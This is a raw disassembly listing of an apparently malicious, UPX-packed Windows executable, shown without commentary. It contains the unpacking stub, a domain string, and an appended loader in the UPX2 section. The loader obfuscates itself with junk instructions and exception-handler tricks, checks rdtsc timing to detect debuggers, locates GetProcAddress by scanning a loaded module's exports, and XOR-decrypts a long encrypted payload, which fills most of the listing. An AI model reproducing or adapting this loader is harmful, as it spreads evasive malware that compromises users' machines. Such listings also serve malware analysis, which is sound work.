dd 6378452Fh, 7B61DBB2h, 5C6E2354h, 65706506h, 5F092C97h
dd 2E6E4711h, 0D8A06F12h, 64410B3Fh, 140F7264h, 7262694Ch
dd 84B60C28h, 4D2B8961h, 8DC4625h, 5FAB1F67h, 100E4865h
dd 9F874496h, 0C2E16CCBh, 701D166Ch, 476B63A2h, 6D61D12Dh
dd 4DE57275h, 366C78DFh, 0C4F39289h, 45986A0Dh, 0E193198h
dd 7B0E8162h, 31E91943h, 0DB639249h, 6BE48376h, 630A6465h
dd 522D6D13h, 70C9785Dh, 45083A1Bh, 0C426657Ah, 3D5E8613h
dd 5868D100h, 15EECDA1h, 1A747079h, 710C4B2h, 0A2FB6CDh
dd 0E611244h, 0C3057BECh, 79666976h, 3CCA6746h, 0B7B016D5h
dd 578F10A1h, 112C796Fh, 0BEC1866Dh, 1079654Bh, 651EB252h
dd 178763F9h, 4114EF3Eh, 69757163h, 871A1672h, 8F494D0Dh
dd 0B9B6745Ch, 0C13AF759h, 0EF0D9267h, 3B0E1041h, 3E0D2194h
dd 90EC510Fh, 350AD6B0h, 98302511h, 2D0466C5h, 0E19E1021h
dd 5FB5458Eh, 0F5696241h, 0C34D6853h, 0AF8B1446h, 0F8DE136Eh
dd 3B77E5DDh, 5696F78h, 69736E61h, 0B6EF6304h, 736FCBF6h
dd 5F48455Fh, 6744DC70h, 78435F0Bh, 98263878h, 0E74C6C4Ah
dd 83936B81h, 768627Dh, 2A427970h, 9A15BB3Bh, 5FDDCFE2h
dd 29332868h, 1CD7399Bh, 11727473h, 5B49060Dh, 6D6C31CCh
dd 0AC0FBA36h, 0D9B6B774h, 3CE9946Ch, 7C737701h, 1966748Bh
dd 5219A682h, 5639651Bh, 3AA29168h, 0BD8146Fh, 1B366331h
dd 0C7290B21h, 5383B669h, 0F44F6449h, 0F6D83B50h, 35A78AE0h
dd 11417355h, 5B01196Ch, 1B114E0Eh, 5D3706A6h, 77936EBBh
dd 0C5D55753h, 525574A2h, 0B2CBA564h, 2125B2Ch, 0D027308h
dd 0B2CB2C01h, 0B6F392Ch, 2CB21734h, 90CB2CBh, 54101304h
dd 16CA00CFh, 46455057h, 2FA025F5h, 0D3275DB7h, 9ACF0340h
dd 0F001FEDh, 6010B01h, 1312340Ch, 98D81D18h, 30E5017Bh
dd 0DD0B3135h, 2C0092Ch, 700C076Bh, 25B99D81h, 710341Eh
dd 0B258E58Ah, 3B680306h, 176C28Ch, 0B0647FC2h, 53581E01h
dd 42EBA75h, 0C1903303h, 34360608h, 0C837C0C4h, 0E004F4EDh
dd 0FB90642Eh, 271211CDh, 48586E0Ah, 0C03838h, 61800060h
dd 33D205Bh, 1962Ch, 0
dd 0FF2000h, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset aMoscowAdvokat_ ; "moscow-advokat.ru"
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31508422
; ---------------------------------------------------------------------------
align 8
loc_31508418: ; CODE XREF: UPX1:loc_31508429�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3150841E: ; CODE XREF: UPX1:315084B6�j
; UPX1:315084CD�j
add ebx, ebx
jnz short loc_31508429
loc_31508422: ; CODE XREF: UPX1:31508410�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508429: ; CODE XREF: UPX1:31508420�j
jb short loc_31508418
mov eax, 1
loc_31508430: ; CODE XREF: UPX1:3150843F�j
; UPX1:3150844A�j
add ebx, ebx
jnz short loc_3150843B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150843B: ; CODE XREF: UPX1:31508432�j
adc eax, eax
add ebx, ebx
jnb short loc_31508430
jnz short loc_3150844C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31508430
loc_3150844C: ; CODE XREF: UPX1:31508441�j
xor ecx, ecx
sub eax, 3
jb short loc_31508460
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_315084D2
mov ebp, eax
loc_31508460: ; CODE XREF: UPX1:31508451�j
add ebx, ebx
jnz short loc_3150846B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150846B: ; CODE XREF: UPX1:31508462�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31508478
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508478: ; CODE XREF: UPX1:3150846F�j
adc ecx, ecx
jnz short loc_3150849C
inc ecx
loc_3150847D: ; CODE XREF: UPX1:3150848C�j
; UPX1:31508497�j
add ebx, ebx
jnz short loc_31508488
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508488: ; CODE XREF: UPX1:3150847F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3150847D
jnz short loc_31508499
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3150847D
loc_31508499: ; CODE XREF: UPX1:3150848E�j
add ecx, 2
loc_3150849C: ; CODE XREF: UPX1:3150847A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_315084BC
loc_315084AD: ; CODE XREF: UPX1:315084B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_315084AD
jmp loc_3150841E
; ---------------------------------------------------------------------------
align 4
loc_315084BC: ; CODE XREF: UPX1:315084AB�j
; UPX1:315084C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_315084BC
add edi, ecx
jmp loc_3150841E
; ---------------------------------------------------------------------------
loc_315084D2: ; CODE XREF: UPX1:3150845C�j
pop esi
mov edi, esi
mov ecx, 0CAh
loc_315084DA: ; CODE XREF: UPX1:315084E1�j
; UPX1:315084E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_315084DF: ; CODE XREF: UPX1:31508504�j
cmp al, 1
ja short loc_315084DA
cmp byte ptr [edi], 1
jnz short loc_315084DA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_315084DF
lea edi, [esi+6000h]
loc_3150850C: ; CODE XREF: UPX1:3150852E�j
mov eax, [edi]
or eax, eax
jz short loc_31508557
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31508529: ; CODE XREF: UPX1:3150854F�j
mov al, [edi]
inc edi
or al, al
jz short loc_3150850C
mov ecx, edi
jns short near ptr loc_3150853A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3150853A: ; CODE XREF: UPX1:31508532�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31508551
mov [ebx], eax
add ebx, 4
jmp short loc_31508529
; ---------------------------------------------------------------------------
loc_31508551: ; CODE XREF: UPX1:31508548�j
call dword ptr [esi+8094h]
loc_31508557: ; CODE XREF: UPX1:31508510�j
popa
jmp loc_31501D18
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 0000A000 ( 40960.)
; Section size in file : 0000A000 ( 40960.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31509000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C4D444h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h
dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 60000387h, 84000000h, 0
dd 26003150h, 500000h, 760h dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
jmp short $+2
nop
pusha
push ebp
mov ebp, esp
call sub_3150B013
call sub_3150B098
xchg ebx, ebx
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150B013 proc near ; CODE XREF: start+7�p
push dword ptr fs:0
mov fs:0, esp
jmp short $+2
sub eax, eax
loc_3150B023: ; CODE XREF: sub_3150B013+16�j
dec al
or al, al
jz short loc_3150B02D
jnz short loc_3150B023
jmp short near ptr loc_3150B093+1
; ---------------------------------------------------------------------------
loc_3150B02D: ; CODE XREF: sub_3150B013+14�j
nop
jmp short $+2
jmp short $+2
nop
call sub_3150B039
stc
sub_3150B013 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150B039 proc near ; CODE XREF: sub_3150B013+20�p
arg_1C = dword ptr 20h
pop ecx
stc
sub ecx, 0FFFFFF8Eh
mov ebx, 2990h
clc
nop
mov esi, 46h
cld
cld
push ecx
cmc
loc_3150B051: ; CODE XREF: sub_3150B039+3B�j
xchg al, [ecx]
xchg ebx, ebx
stc
jmp short $+2
sub ax, si
jmp short $+2
cld
xchg al, [ecx]
xchg ebx, ebx
inc ecx
add si, 0EEh
sub ebx, 1
jmp short $+2
jmp short $+2
cld
nop
cmp ebx, 0
jnz short loc_3150B051
pop ecx
mov ecx, ecx
cmc
mov esi, [ebp-8]
mov fs:0, esi
jmp short $+2
cld
leave
clc
clc
mov [esp-8+arg_1C], ecx
xchg ebx, ebx
cmc
popa
cld
clc
loc_3150B093: ; CODE XREF: sub_3150B013+18�j
jmp ecx
sub_3150B039 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_3150B098 proc near ; CODE XREF: start+C�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_3150B098 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 87h, 0DBh
; ---------------------------------------------------------------------------
clc
mov ebx, ebx
call $+5
mov eax, [esp]
cld
mov [eax+32C7h], ebx
mov ecx, [eax+297Fh]
mov ebx, [esp+4]
and ecx, 10000000h
jz short loc_3150B0F6
pop ecx
mov [eax+32CBh], esi
mov cl, [eax+2983h]
mov [eax+32CFh], edi
cmp cl, 0E8h
jz short loc_3150B0EB
mov ebx, [eax+2985h]
jmp short loc_3150B0F4
; ---------------------------------------------------------------------------
loc_3150B0EB: ; CODE XREF: UPX2:3150B0E1�j
add ebx, [eax+2984h]
mov ebx, [ebx+2]
loc_3150B0F4: ; CODE XREF: UPX2:3150B0E9�j
mov ebx, [ebx]
loc_3150B0F6: ; CODE XREF: UPX2:3150B0C9�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1EAFh
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+103990h]
mov ecx, 0
rep movsb
call sub_3150B1CF
mov ecx, eax
call sub_3150B1CF
sub eax, ecx
jz short loc_3150B1A1
cmp eax, 100h
ja short loc_3150B1A1
and ebx, 0FFFFF000h
loc_3150B135: ; CODE XREF: UPX2:3150B144�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_3150B146
loc_3150B13E: ; CODE XREF: UPX2:3150B153�j
sub ebx, 100h
jnz short loc_3150B135
loc_3150B146: ; CODE XREF: UPX2:3150B13C�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3150B13E
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3150B160: ; CODE XREF: UPX2:loc_3150B174�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_3150B174
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3150B179
loc_3150B174: ; CODE XREF: UPX2:3150B169�j
loop loc_3150B160
pop ecx
jmp short loc_3150B1A1
; ---------------------------------------------------------------------------
loc_3150B179: ; CODE XREF: UPX2:3150B172�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+10113Fh]
mov dx, [eax-17h]
call sub_3150B1D4
jmp short loc_3150B1E9
; ---------------------------------------------------------------------------
loc_3150B1A1: ; CODE XREF: UPX2:3150B126�j
; UPX2:3150B12D�j ...
mov eax, [ebp+103984h]
and eax, 10000000h
jz short loc_3150B1CD
mov edi, [esp+4]
lea esi, [ebp+103988h]
lodsd
mov ebx, [ebp+1042CCh]
stosd
movsb
mov edi, [ebp+1042D4h]
mov esi, [ebp+1042D0h]
loc_3150B1CD: ; CODE XREF: UPX2:3150B1AC�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_3150B1CF proc near ; CODE XREF: UPX2:3150B118�p
; UPX2:3150B11F�p
rdtsc
retn
sub_3150B1CF endp
; ---------------------------------------------------------------------------
adc dl, al
; =============== S U B R O U T I N E =======================================
sub_3150B1D4 proc near ; CODE XREF: UPX2:3150B19A�p
push ebx
mov ecx, 2845h
mov ebx, edx
loc_3150B1DC: ; CODE XREF: sub_3150B1D4+11�j
xor [eax], dl
sub dl, bl
xchg bl, bh
inc eax
xchg dl, dh
loop loc_3150B1DC
pop ebx
retn
sub_3150B1D4 endp
; ---------------------------------------------------------------------------
loc_3150B1E9: ; CODE XREF: UPX2:3150B19F�j
clc
into
; ---------------------------------------------------------------------------
db 0
dd 8C7DF000h, 88DFA313h, 0CC52DE99h, 7FE19011h, 46ABF926h
dd 0A8AA4052h, 202630E5h, 61C76227h, 965B9594h, 81EEBE39h
dd 76E9E3D8h, 0BEB815DDh, 6DE670C0h, 78A504Ch, 414A44ADh
dd 72C76437h, 0E08C9FB2h, 49AC2F6Fh, 0B0C89E3Dh, 83B17834h
dd 0A06B70B0h, 0BF31D423h, 0DFB6CF57h, 105C3EB1h, 0EF1E75A0h
dd 0C0595199h, 976B3098h, 81528001h, 0D53164E5h, 405A12C0h
dd 35F1BD76h, 85CD1014h, 0E0AEE510h, 65B9D717h, 0A0A6A5E8h
dd 9713F4h, 60AE6065h, 55AEF56Fh, 0A3A63078h, 10379841h
dd 26C9F060h, 0D0080C59h, 151FB158h, 8002AEE6h, 7572C5DDh
dd 893950DCh, 1EB88DC5h, 20B310D4h, 0E07D7DA8h, 55058FBCh
dd 0A0668E46h, 8FED7875h, 606EA4B4h, 54ADDBACh, 0E3657042h
dd 0F210CCh, 0D6DB7928h, 0A8DAC0A2h, 0A056C2F4h, 152D90FEh
dd 605E4EA6h, 0C4C59009h, 204632E6h, 779D13h, 6B3EE010h
dd 0CC016993h, 4DB7B0F8h, 80A28074h, 7272E57Dh, 0E559507Ch
dd 0CCA5D217h, 6A5E9B44h, 0B9DEC3E8h, 0DBDF45D1h, 0BE5B0C8h
dd 0D71B6CDFh, 7C498EC0h, 4089381Bh, 0B5F930C9h, 922E72h
dd 65DE3443h, 5FFEDFFCh, 37F6B0BAh, 8118905Eh, 60EA70D8h
dd 406A38ACh, 0B51930A9h, 722E12h, 64D13025h, 0C05AD29Eh
dd 0C886B0F2h, 80569014h, 880F70FAh, 41200700h, 20C758D8h
dd 95BD1005h, 0E0AECEB6h, 0C13ADA94h, 96234F78h, 683280CAh
dd 60AE7075h, 40280105h, 79A65A68h, 0A481A07h, 0DE34659Fh
dd 31F1D0CCh, 0F62B339Bh, 801280EAh, 62BAF45Fh, 46E250CCh
dd 6E863048h, 4C4E5490h, 92EB0F40h, 4DFAC082h, 0B061668Dh
dd 0D3BA3B4h, 7050CE8Dh, 0D3E4E1ACh, 206445C0h, 0F25F93A4h
dd 0E05EE01Eh, 0C2DA5493h, 25DDB018h, 80C2AE56h, 0EF4F00EFh
dd 50F28B09h, 0FAC3BB08h, 0FFC200BAh, 65B1F170h, 0C0AAE954h
dd 9EF03573h, 0F04D9064h, 4FABFFF1h, 0CBAA4055h, 3018FA65h
dd 0FFB8F364h, 6591F191h, 0C08AE960h, 9EC43D53h, 89719044h
dd 0EF0F012Fh, 50B319C9h, 21BED8C8h, 0BD0F1044h, 0E0EECF88h
dd 0C0101FB7h, 0D009694Eh, 83931330h, 99ED30DAh, 2A6A3A7Bh
dd 0C353BDB0h, 0B9620031h, 0E0DEF0B9h, 3E17D491h, 0C6294F67h
dd 0CD561DBFh, 60CE7090h, 7C7FB6Ah, 0C4F49B8Ch, 3DB68589h
dd 8612F090h, 6B5CD275h, 42B472FBh, 0EAE61B01h, 12421870h
dd 8CA150ECh, 0E42D3002h, 4A108Eh, 8A96F060h, 0AA48819Ch
dd 3569E056h, 8002AE1Ah, 204AF308h, 4078BCA4h, 4A52BB48h
dd 6ACE9BC4h, 8A7E9A00h, 0C09082BEh, 0A0045C50h, 0D1F2FAB4h
dd 9F3E8F5Ah, 50D48639h, 0A53F6F28h, 7661F5Bh, 6D5EF021h
dd 0D0CAD029h, 0ACED0918h, 6F599094h, 8DCFD5E3h, 40DA408Ch
dd 3404B585h, 0E03D1094h, 0C054A450h, 55452F16h, 0A0268E26h
dd 0F5ED50F1h, 616198C4h, 5142506Ch, 732630E8h, 62C75401h
dd 924E9795h, 0ACF3A635h, 0A073D7BDh, 85C27803h, 0D5F170D0h
dd 409A1200h, 1E64A537h, 0FFD51054h, 0F0C0D655h, 0AA7ABA3Ch
dd 0F6634FBAh, 3972800Ah, 60EE7198h, 0C98B7BBBh, 77B214A4h
dd 3EF885DBh, 16EDF0B0h, 0FF6C759Fh, 0F4D6B088h, 1EC76F43h
dd 0E5CE60AEh, 62C24CCh, 52C2CE0Bh, 2436EFEAh, 8ABE9A88h
dd 56AF2FD6h, 25B6A046h, 13EEE434h, 60ABF898h, 0D1E363ECh
dd 0A59F0A8Bh, 322FD2h, 9C1FC215h, 0B379F4F8h, 88E2C32Ah
dd 8EB55155h, 34DE7050h, 105B069Ch, 0B5796318h, 122E8Ah
dd 942730C5h, 0E48E2FB3h, 96F33F30h, 68F2808Bh, 9F918DF5h
dd 667FAFFFh, 0CB662016h, 2826912Ah, 0B75EF021h, 0FEFC4563h
dd 35A9B008h, 80C2AEB2h, 9FB5B0F9h, 2A905073h, 4A465A08h
dd 68C27A84h, 0E03AF001h, 0C0D014F7h, 2B3ADAA8h, 0D6506FB0h
dd 601A2F88h, 0A863636Ch, 0DFD9CF32h, 15F385E9h, 0B14CF0F0h
dd 5565800Dh, 0A0068EF2h, 43B254D7h, 38568F5Bh, 72665014h
dd 2E6D30C8h, 831044h, 0E0FEF0C0h, 0C07AD03Ch, 8972B0B8h
dd 80729034h, 36BF70B0h, 72FFAF7Fh, 8BE62096h, 0C0E6BC7Dh
dd 0E3C0BD5h, 0BDCF5DDFh, 0F2D6A081h, 0BED805EBh, 0E5477080h
dd 405A1240h, 20C62660h, 6F2D5C04h, 0B0CE85EBh, 0A94CB98Eh
dd 0C5D1D514h, 0F55EF1A2h, 30AE3115h, 7E18C513h, 0A52F3078h
dd 3252B4h, 81DCACA3h, 0A154B5AFh, 0EFF2D535h, 0E377FAB6h
dd 36D20324h, 236F03B8h, 53EA303Ch, 656E62B0h, 923DF02Eh
dd 0A58EB1D9h, 0C51AD97Eh, 0F2B190F5h, 51A1155h, 258639EAh
dd 50165165h, 41857ECDh, 852CB320h, 90BFA4FDh, 0C535DF6Ah
dd 8093E3E7h, 12B0253h, 259835F8h, 45325F65h, 65B078D0h
dd 0A33E9461h, 0B4DBB50Eh, 0D25EE49Dh, 80D6F111h, 14B02B3h
dd 2FFE3518h, 454E5C87h, 32916008h, 907F9EB3h, 0B4F5B82Fh
dd 0C96EF5D8h, 0F2FAC420h, 606A11B5h, 25E6390Ah, 456B599Ch
dd 79D17F10h, 8D9B84B3h, 0A517B968h, 0C584F6B8h, 0E21BDC51h
dd 199C11C2h, 340F172Ch, 458A59EEh, 72166465h, 94AB92C9h
dd 0C01BA379h, 0E6A2D5DFh, 0D337FC7Dh, 60AB0AF9h, 63E354Bh
dd 74A35CE1h, 277D6Dh, 0ADCA95C7h, 0AC4FB493h, 0CED7F81Dh
dd 0C157FC90h, 14CB3770h, 304735B8h, 45CA592Eh, 654F71AAh
dd 85D9F021h, 0AD7F84A8h, 0D4F7E028h, 0C712D1BCh, 5D80435h
dd 2F6323BEh, 45C13026h, 726746B0h, 8E119933h, 0C0BBA8F9h
dd 0F602D57Fh, 0ED87FCDBh, 6003955h, 218722C3h, 4E09595Ch
dd 6FAE10E5h, 89129441h, 0B2BBA2FEh, 0ED56F161h, 0E984E0F5h
dd 6010775h, 25A639CAh, 45367F08h, 6CAB56EAh, 905FBD65h
dd 0A7D4B90Ch, 0D079B0B9h, 0F2E2FE11h, 134B139Fh, 32FA501Fh
dd 53435387h, 46902317h, 946D8289h, 0AFE8805Ch, 0D365D5BBh
dd 0E5DCA267h, 330E04A8h, 29CC2429h, 544755A4h, 62EB6230h
dd 939B84B5h, 0A529D07Dh, 0CC9FF6CCh, 0ED1BC451h, 0CBD70D5h
dd 401A3549h, 549549FBh, 69367D41h, 8F8A95CDh, 0A536B95Ah
dd 0C5BBD9CCh, 0ED3CC514h, 99800F1h, 26052769h, 45AA59CEh
dd 722B4604h, 8CDF85F4h, 0AF56BCBDh, 0D2E1B01Bh, 0C657E49Dh
dd 60CB1C19h, 246B24A2h, 54D54502h, 764B62B4h, 87FB9C09h
dd 0AF4EA3B9h, 0A0F8D533h, 0F251E49Ah, 5FA1135h, 2566398Ah
dd 63F27E48h, 746375B6h, 8F0CA025h, 0B389B5DFh, 0E302FE38h
dd 0F493F5C6h, 0F1C2055h, 339935CFh, 6E66486Dh, 659053D0h
dd 0B33B8441h, 0A9AEB3F9h, 0EE56DE77h, 0E5A0D3E0h, 352B0471h
dd 10B835FFh, 45255F7Ah, 4EC263F7h, 905FBD74h, 0B7DFB92Ah
dd 0C565D6B7h, 0EFDBE417h, 1460709Eh, 2ECF2023h, 454A59AEh
dd 4FD65E64h, 0B0709590h, 0A5F9BF2Eh, 0CF42C3ABh, 80FCF53Fh
dd 1041049Eh, 25D93E29h, 4F6F44ABh, 74CC102Ah, 94918290h
dd 960EB359h, 0D582C2D1h, 0E53FFC55h, 199C1FDDh, 111E1E2Ch
dd 599455DDh, 6F047E6Dh, 94BF9DD2h, 9434BF75h, 0CEB3DBF7h
dd 0D726DE14h, 5BA19E2h, 3438395Ah, 6DAA51FDh, 722D7D61h
dd 94ECF0F9h, 0A9548590h, 0C5D2DF1Bh, 0E940E4A7h, 0FFA171Eh
dd 29593EADh, 49D4443Bh, 5722778Ah, 94CDB133h, 0B56EA2BDh
dd 0CCF5B028h, 0F377E3BBh, 5E5133Fh, 2F6950B8h, 43E35E26h
dd 656510B0h, 93119834h, 0AE83B2C8h, 0A013DD59h, 0F691F5C6h
dd 0E0B0330h, 2F9950C8h, 54035B4Bh, 748C59A4h, 85308245h
dd 0AFB693E8h, 0C11ED56Bh, 0E5BEF4FAh, 14203910h, 25A422E9h
dd 5423777Ch, 6EAC7FC7h
dd 854A9365h, 0A1CE8318h, 0E936D58Ch, 0F2D7E41Ah, 2F5A159Eh
dd 1C4351Ch, 544879E8h, 65CC6201h, 856EBF94h, 0ACE88532h
dd 0CE5FB099h, 0EEE0F520h, 55C04B5h, 29CC342Dh, 610655A4h
dd 50C34600h, 0CECCC389h, 0C0369C78h, 0E391D5EAh, 0E501FF58h
dd 609715FBh, 0F0D357Eh, 6B8855D8h, 78276941h, 858CF0E1h
dd 0A52F817Bh, 0C180C9EAh, 0C537E578h, 32CE31E8h, 25193769h
dd 4CA766FCh, 78077571h, 0D3E8F0C1h, 9638BA0Ah, 0CA623B2Eh
dd 0F2CDC2F5h, 0F5512668h, 403A12BCh, 76F0F4E3h, 0FF7440B2h
dd 7561E810h, 0C00AEE62h, 0FE8674DBh, 0D129816h, 0A8A58B19h
dd 400A389Dh, 6C0BD848h, 6813E0h, 0B02FF52Ah, 4BFFBAEFh
dd 74FDE0F4h, 0C098C4E4h, 9F3D2261h, 50D4B639h, 2CA2B328h
dd 3E0C855Bh, 24DDF030h, 55571394h, 0A0468DECh, 80B859A7h
dd 607E1842h, 844150BEh, 602C6159h, 18A841D4h, 0B4363083h
dd 3FEADE16h, 0B008526Dh, 0A0761374h, 0A0ABA2C3h, 0B768C963h
dd 0E2056832h, 0FF9147A7h, 1FE13108h, 651EDFA3h, 0F016B0D8h
dd 80E07C3Ch, 0ADAFBD0h, 2A46DB4Ch, 20065888h, 2E81054h
dd 88FE9A92h, 0C07AA2D0h, 0F3A7B0D2h, 56E76F64h, 3FEE608Eh
dd 66FFAF75h, 0A5E62096h, 8B1364DBh, 0F0CB782Dh, 4D56331Ch
dd 0B0C6B00Dh, 0D7839314h, 0EB1C8FC3h, 50749289h, 0FA49BD88h
dd 0E842102Ch, 1F410FABh, 0FEE05577h, 2F3BB068h, 8032B9D3h
dd 9F516A98h, 86AFDB13h, 0ADA62056h, 0B3E6Bh, 1F971860h
dd 45912F23h, 0A0868E92h, 0A0665051h, 49B5FFDDh, 0B4E250CCh
dd 0AB79CFB6h, 103CC241h, 94BE7540h, 88755DB7h, 4876B011h
dd 7F0D6E6Bh, 0A331B7BBh, 40EAB8F9h, 0A13B3028h, 10F90C49h
dd 6D97C320h, 0D0C47719h, 0F102E118h, 0D183C0C5h, 5E1CE5EFh
dd 444D509Ch, 6D3CF2Ch, 5DC200BAh, 0B53EF4C2h, 0C0BAD094h
dd 4DB7EDF8h, 80A28B3Fh, 0F5A38F9Ah, 40BA4B7Ah, 0EB62B8h
dd 881040h, 86123463h, 0DBC6559Bh, 80DBB0C8h, 9BCC1593h
dd 602A70C0h, 83D75066h, 0C85E2AA2h, 82104Dh, 4A9FB24Dh
dd 300F19C2h, 0E063D97Bh, 8572800Bh, 22E67834h, 7F2AC5A5h
dd 0C21130B8h, 8A45E7h, 0BDDEF0A0h, 0DBFF3D9Dh, 3D5DB088h
dd 8042AF50h, 68EA0C13h, 0F9CE5F0Ch, 0A1C63088h, 4018E8h
dd 0E4D6A480h, 3F3AD0FDh, 0B088CAEDh, 0DCE1BF4h, 61AA54F4h
dd 2A7A50ECh, 20A2D868h, 527410E4h, 1FC9F032h, 0D024A649h
dd 2D5F8358h, 80139443h, 0ADF2150h, 416001CEh, 20863020h
dd 95FD4284h, 0E06ECE02h, 0B40C552Ah, 0C822E063h, 80F291B0h
dd 44DA8F67h, 40EA528Ch, 1F44A5D7h, 85BB10B4h, 34884E0h
dd 14518088h, 0F104B072h, 152DC6C3h, 605E4EAAh, 350AD5D5h
dd 0B5B966D8h, 0D22EA2h, 0B27AA78Dh, 98FEBA2Bh, 0A1322775h
dd 0B3199074h, 393E1A30h, 10FAFB9Fh, 707660B8h, 955D4234h
dd 0E00ECEAAh, 0C29214DDh, 0D4E9B0D8h, 156D9870h, 601E4FC2h
dd 521FAF1Fh, 7D0620F7h, 80821486h, 0E18BFAFEh, 44F75B7Ah
dd 43F6A0ADh, 80E71D2Dh, 63EE60A0h, 929506FDh, 0A8E9F02Ch
dd 62113Bh, 0E1CE74AFh, 0FEDAD01Ch, 0E6C6C5A2h, 8F52AE94h
dd 60CF7114h, 6074D00Ch, 0A180C1FDh, 4E0B403Ah, 6BFC85C7h
dd 0C17C1633h, 0F1789B37h, 0D663909Eh, 6A3B8F23h, 192A40D3h
dd 0A5A9F153h, 22103Bh, 0FE0575EDh, 0C070D0CCh, 0A096BC30h
dd 7F41C0D4h, 70B17AC5h, 40066DCCh, 0A5893048h, 2107Bh
dd 0E07E41A9h, 90C451BCh, 0AF20F96Ah, 80F23531h, 68A8F330h
dd 4FE76C00h, 2066A9ACh, 75C22CA4h, 0DA625CD3h, 0C0565593h
dd 0ADFBB018h, 0A0F2B0B4h, 529512Dh, 0ECB525F8h, 5C331034h
dd 203D6E05h, 954A8468h, 0C3C4510Dh, 8F198A88h, 0C774F801h
dd 5121700Fh, 408D40D6h, 72C4C7E8h, 3E08859Bh, 202DF0F0h
dd 90CA800Ch, 0A016B930h, 0F7FDD454h, 1611CBEh, 0D5755028h
dd 20160FD2h, 36F6D0C1h, 657739F3h, 0C06AEF78h, 0A2F6D8E9h
dd 0D1231034h, 0F51120E6h, 407A6F32h, 3B79A525h, 33321034h
dd 0B08FA469h, 3F0B814Eh, 0B0E8E20Dh, 0A4561714h, 5EE8E56Fh
